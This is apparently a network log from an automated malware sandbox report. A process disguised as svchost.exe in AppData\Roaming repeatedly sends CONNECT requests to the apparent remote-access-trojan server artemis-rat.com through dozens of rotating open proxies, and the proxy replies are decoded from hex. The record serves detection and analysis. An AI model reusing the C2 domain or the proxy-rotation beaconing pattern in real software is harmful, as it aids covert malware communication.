                                                                                    Mar 9, 2024 13:14:33.167402029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.503391027 CET314INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: close
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3045192.168.2.55980791.107.180.2508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.167579889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3046192.168.2.55945368.71.247.130414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.170129061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3047192.168.2.559833194.247.173.17808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.174689054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3048192.168.2.559860139.162.224.37312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.181077003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3049192.168.2.559808203.171.19.988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.184026957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.546619892 CET503INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Sat, 09 Mar 2024 12:15:08 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 324
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3050192.168.2.559279138.36.150.15108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.203156948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.833575964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.536767960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.833658934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3051192.168.2.55927461.19.145.66808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.203309059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.319679976 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3052192.168.2.559197140.238.245.116810043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.215733051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.176908016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.380583048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3053192.168.2.559888192.154.246.96900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.246718884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3054192.168.2.55938152.151.210.204900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.264764071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3055192.168.2.559869119.23.148.1738043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.265736103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3056192.168.2.55983093.171.220.229888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.266591072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.677398920 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3057192.168.2.559312167.71.5.83808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.267235994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3058192.168.2.557906162.214.90.493440943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.269776106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.374130964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3059192.168.2.559877118.184.157.1118043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.270015955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.618859053 CET321INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty/1.21.4.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 163
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3060192.168.2.559893199.188.93.214900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.270021915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3061192.168.2.559335193.84.89.202844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.270162106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3062192.168.2.55986164.43.89.82634143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.270371914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.626559019 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3063192.168.2.559902172.67.181.1448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.270402908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.424882889 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3064192.168.2.55937245.128.135.1108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.271209955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3065192.168.2.559371178.62.229.28312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.271267891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.974112988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3066192.168.2.55987291.134.140.160887943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.277760029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.177222013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.271298885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.474638939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3067192.168.2.55782445.11.95.166601243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.293112993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.145603895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3068192.168.2.55939572.49.49.113103443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.320487022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3069192.168.2.558066104.238.111.1072145343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.421626091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.677350044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3070192.168.2.559946162.159.241.128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.425998926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.587371111 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3071192.168.2.559871223.113.80.158909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:33.442287922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.901634932 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:15:21 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
